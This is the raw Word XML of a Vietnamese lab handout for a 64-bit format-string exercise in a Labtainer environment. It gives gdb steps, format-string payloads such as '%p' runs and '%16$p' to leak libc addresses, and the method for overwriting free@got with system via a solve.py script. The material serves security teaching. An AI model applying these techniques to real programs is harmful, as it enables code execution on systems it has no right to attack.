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3B89" w14:textId="4B5D03BD" w:rsidR="006B7D63" w:rsidRPr="000A08BE" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A08BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Format String: 64 bit application 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFAD51B" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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1. Tổng quan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CE3A95" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:p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Lab này bao gồm mã nguồn của chương trình lỗi được biên dịch và chạy dưới kiến trúc 64-bit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA54CC" w14:textId="764B19FC" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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Yêu cầu đối với sinh viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A83FAD0" w14:textId="414F21AD" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439DC32" w14:textId="04F54427" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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Môi trường lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC153D0" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:p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Từ thư mục labtainer-student bắt đầu bài lab bằng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B930E6" w14:textId="48F35CDE" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">labtainer -r </w:t>
      </w:r>
      <w:r w:rsidR="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ptit-</w:t>
      </w:r>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>format64_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95B554" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:p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Sinh viên sẽ được cung cấp 3 container, trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DA1FD" w14:textId="77777777" w:rsidR="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Container attacker: chạy 2 terminal, chứa binary của service chạy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A3D6E1" w14:textId="77777777" w:rsidR="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Container ghidra: chạy 1 terminal, chứa binary của service chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537459CC" w14:textId="677D0E8B" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Container server: chạy ẩn binary của service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5CCA3" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A867C6" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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Mục đích bài lab: Giúp sinh viên hiểu được về kỹ thuật tấn công buffer overflow Ret2Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1F99D" w14:textId="33438B01" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="00170AE5" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>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Find buffer index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF1B7FA" w14:textId="17251D34" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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 xml:space="preserve">Mục đích: </w:t>
      </w:r>
      <w:r w:rsidR="00DA0D01" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tìm được index trỏ đến đầu buffer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432BD7A6" w14:textId="22604586" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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 xml:space="preserve">Các bước thực hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257FB3F" w14:textId="5FBA7761" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D0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Thực hiện debug tiến trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F82A367" w14:textId="1FBF2C59" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D0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gdb format64_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04151BEA" w14:textId="2365C5A1" w:rsidR="00EB4473" w:rsidRPr="00994C26" w:rsidRDefault="00EB4473"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Chạy chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B7500" w14:textId="34DF1DCB" w:rsidR="00EB4473" w:rsidRPr="00994C26" w:rsidRDefault="00EB4473"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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A15215D" w14:textId="2D5D8EF7" w:rsidR="00EB4473" w:rsidRPr="00994C26" w:rsidRDefault="00EB4473"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Tiến hành tạo một khối với nội dung bất kì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794266AE" w14:textId="16F2EF77" w:rsidR="00EB4473" w:rsidRPr="00994C26" w:rsidRDefault="00EB4473"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D96A52" w14:textId="2564E72D" w:rsidR="00EB4473" w:rsidRPr="00994C26" w:rsidRDefault="00EB4473"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Index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05636B" w14:textId="1A8FB779" w:rsidR="00EB4473" w:rsidRPr="00994C26" w:rsidRDefault="00EB4473"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Size = 20</w:t>
      </w:r>
      <w:r w:rsidR="00953650" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F507395" w14:textId="7E1F2240" w:rsidR="00EB4473" w:rsidRPr="00994C26" w:rsidRDefault="00EB4473"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lastRenderedPageBreak/>
        <w:t>Content = AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B71EC49" w14:textId="4A76EEA1" w:rsidR="00EB4473"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Chỉnh sửa khối để trigger được bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD6B62" w14:textId="7574760A"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M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE15FDD" w14:textId="2D862E6F"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Index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C499C2" w14:textId="2222D771" w:rsidR="00170AE5" w:rsidRPr="00994C26" w:rsidRDefault="00953650" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Content = %p%p%p%p%p%p%p%p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFC911" w14:textId="54D1BA08"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N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDAA677" w14:textId="3F5DD4AD"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Output sẽ in ra giá trị trên stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4C12D" w14:textId="4DDAFB38"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Tìm phần tử %p tương ứng khi thấy bắt đầu có sự lặp lại các giá trị in ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622ED512" w14:textId="32AFDFBF" w:rsidR="001E5331"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Sử dụng Ctrl-C để thoát tiến trình debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D115D" w14:textId="071160B0" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="00170AE5" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>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Leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFEA44" w14:textId="0B976C84" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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 xml:space="preserve">Mục đích: </w:t>
      </w:r>
      <w:r w:rsidR="00DA0D01" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Leak được địa chỉ trên stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375ADF23" w14:textId="5CF28AB5" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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 xml:space="preserve">Các bước thực hiện:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC032D2" w14:textId="7E3E0FA1"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Thực hiện debug lại chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA8575" w14:textId="7A5E2ED3"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gdb format64_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46317654" w14:textId="77777777"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Tiến hành đặt break point tại hàm printf gây lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3745F3" w14:textId="729546A2"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b *modify+476</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C3B80D" w14:textId="30FAED47"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Chạy chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D888C" w14:textId="310D0793"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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE852C4" w14:textId="45F91DF4"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Tiến hành nhập nội dung tạo một khối:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCFF205" w14:textId="77777777"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608494D0" w14:textId="77777777"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Index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594DD816" w14:textId="77777777"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Size = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FEE8EB" w14:textId="2665D39E" w:rsidR="00953650" w:rsidRPr="00994C26" w:rsidRDefault="00953650"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Content = AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD1F7E" w14:textId="621AF81E" w:rsidR="00953650" w:rsidRPr="00994C26" w:rsidRDefault="00953650"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Tiến hành leak thông tin sử dụng hàm modify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD7BD4" w14:textId="6A1EA979" w:rsidR="00953650" w:rsidRPr="00994C26" w:rsidRDefault="001E533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M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355886DC" w14:textId="2D4D6FE1" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9D84B" w14:textId="522FE7DA" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Content = %16$p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE8132" w14:textId="47E4E1E7" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BB325C" w14:textId="3DC14AD4" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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lastRenderedPageBreak/>
        <w:t>Output thu được theo payload trên là giá trị hex là địa chỉ của _IO_2_1_stdout_ trong libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED7725" w14:textId="7C1D91E6" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Sinh viên có thể tự do chọn giá trị leak khác trên stack để thực hiện bài </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A23129" w14:textId="6BB95FE4" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>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VMMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D44B6FB" w14:textId="783248D8" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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 xml:space="preserve">Mục đích: </w:t>
      </w:r>
      <w:r w:rsidR="00DA0D01" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tính địa chỉ base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C80CB" w14:textId="2F287B4D" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63"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Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F0E8B" w14:textId="556AD425" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Tại cửa số đang debug thực hiện câu lệnh vmmap để in ra thông tin phân vùng bộ nhớ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5981B4" w14:textId="299893E1" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Vmmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC455F3" w14:textId="6F17D8D1" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Địa chỉ ở cột start tại dòng đầu tiên trỏ tới libc là địa chỉ base của libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BF2802" w14:textId="6980B17F" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Lưu lại giá trị này để tiến hành thực hiện tính offset</w:t>
      </w:r>
      <w:r w:rsidR="00EB4671" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho hàm system </w:t>
      </w:r>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ở bước sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092645FB" w14:textId="225E4DAD" w:rsidR="00EB4671" w:rsidRPr="00994C26" w:rsidRDefault="00EB467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Thực hiện tính offset của giá trị vừa leak ở bước trên bằng cách lấy giá trị đó trừ đi giá trị của libc base address vừa tìm được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59546855" w14:textId="79B1FC73" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>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System address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16337413" w14:textId="34F1AEEE" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01"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Mục đích: Tìm địa chỉ system để tính system offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8C5A8" w14:textId="15188C4B" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01"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Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CAD809" w14:textId="1563B25C" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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Thực hiện in ra địa chỉ của hàm system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE26AD" w14:textId="4C29552C" w:rsidR="001E5331" w:rsidRPr="00994C26" w:rsidRDefault="001E533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print system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260AC346" w14:textId="71CACD28" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00EB467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Tiến hành lấy địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="00B27CC8" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>system trừ đi địa chỉ libc base vừa tìm được bên trên để tìm được offset của system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C8DBE" w14:textId="2E240F63" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>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Got address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17269DD9" w14:textId="15DB6B75" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01"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Mục đích: Tìm được địa chỉ của got để ghi đè vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F824FEB" w14:textId="1A35A332" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01"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Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C26678" w14:textId="42757DC5" w:rsidR="00B27CC8" w:rsidRPr="00994C26" w:rsidRDefault="00B27CC8"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Từ cửa sổ debug hiện tại chạy lệnh got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066C88E" w14:textId="2C904891" w:rsidR="00B27CC8" w:rsidRPr="00994C26" w:rsidRDefault="00B27CC8"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got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6789B9" w14:textId="4ED07DCA" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00B27CC8"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Lưu lại địa chỉ got của hàm free (được đặt trong cặp ‘[ ]’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F768287" w14:textId="44CBD0D6" w:rsidR="009334B1" w:rsidRPr="00994C26" w:rsidRDefault="009334B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Thực hiện thoát cửa sổ debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A177BE1" w14:textId="6FDC83D1" w:rsidR="009334B1" w:rsidRPr="00994C26" w:rsidRDefault="009334B1"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quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B7CB0" w14:textId="7317C4CD" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>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Overwrite got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B36CB" w14:textId="0D201207" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01"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lastRenderedPageBreak/>
        <w:t>Mục đích: Ghi đè got bằng system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC1CED4" w14:textId="46C4BA33" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01"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t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04280475" w14:textId="226858A1" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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Tại một cửa sổ terminal của attacker thực hiện chạy pwnserver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D835619" w14:textId="18DF8E54" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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./gdbpwn-server.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48758B72" w14:textId="709B32D1" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="009334B1"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Chỉnh sửa </w:t>
      </w:r>
      <w:r w:rsidR="00D6323C" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>file solve.py</w:t>
      </w:r>
      <w:r w:rsidR="0032140C" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tại cửa sổ terminal attacker còn lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDFED1" w14:textId="2B82DC42" w:rsidR="00D6323C" w:rsidRPr="00994C26" w:rsidRDefault="00D6323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nano solve.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564890DD" w14:textId="67D8D4D9" w:rsidR="00D6323C" w:rsidRPr="00994C26" w:rsidRDefault="00D6323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Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00B170FB" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">chỉnh sửa payload để thực hiện ghi đè free@got.plt bằng system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046A7016" w14:textId="5A12A3E3" w:rsidR="00B170FB" w:rsidRPr="00994C26" w:rsidRDefault="00B170FB"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Tạo 1 khối bất kì sau đó xóa đi để thực hiện resolve địa chỉ cho hàm free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826220B" w14:textId="31A99554" w:rsidR="00B170FB" w:rsidRPr="00994C26" w:rsidRDefault="00B170FB"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Tạo khối mới dùng để trigger bug với content bất kì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D275A1" w14:textId="44068561" w:rsidR="00B170FB" w:rsidRPr="00994C26" w:rsidRDefault="00B170FB"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Tiến hành input để leak dữ liệu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4937B414" w14:textId="75097ED0" w:rsidR="00B170FB" w:rsidRPr="00994C26" w:rsidRDefault="00B170FB"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Tính lấy địa chỉ leak </w:t>
      </w:r>
      <w:r w:rsidR="009A0A8C" w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>được trừ đi offset1 đã tìm ở trên để lấy được địa chỉ base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFEDC5" w14:textId="26079EC5" w:rsidR="009A0A8C" w:rsidRPr="00994C26" w:rsidRDefault="009A0A8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Cộng địa chỉ base với offset của hàm system đã tính ở trên để ra được địa chỉ của hàm system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB2299" w14:textId="0B81A1E9" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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Sau khi tìm được các địa chỉ offset1, offset_system, free_got tiến hành thay vào payload sao đó chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D21DE" w14:textId="092DBA63" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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python3.8 solve.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54155F" w14:textId="113BB80A" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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Khi pwnserver đã bắt được tiến trình debug sử dụng lệnh continue để tiếp tục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B100664" w14:textId="6F2D5995" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7434A8" w14:textId="61265D39" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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Tại cửa sổ còn lại ấn phím bất kì để tiếp tục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3430E" w14:textId="73977F66" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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Tại pwnserver tiếp tục chạy continue cho đến khi breakpoint chạm địa chỉ (modify+476)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF6F7C" w14:textId="091E8EBF" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="003C68A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Tiếp tục chạy lệnh continue để đến breakpoint tại modify tiếp theo:</w:t>
      </w:r>
    </w:p>
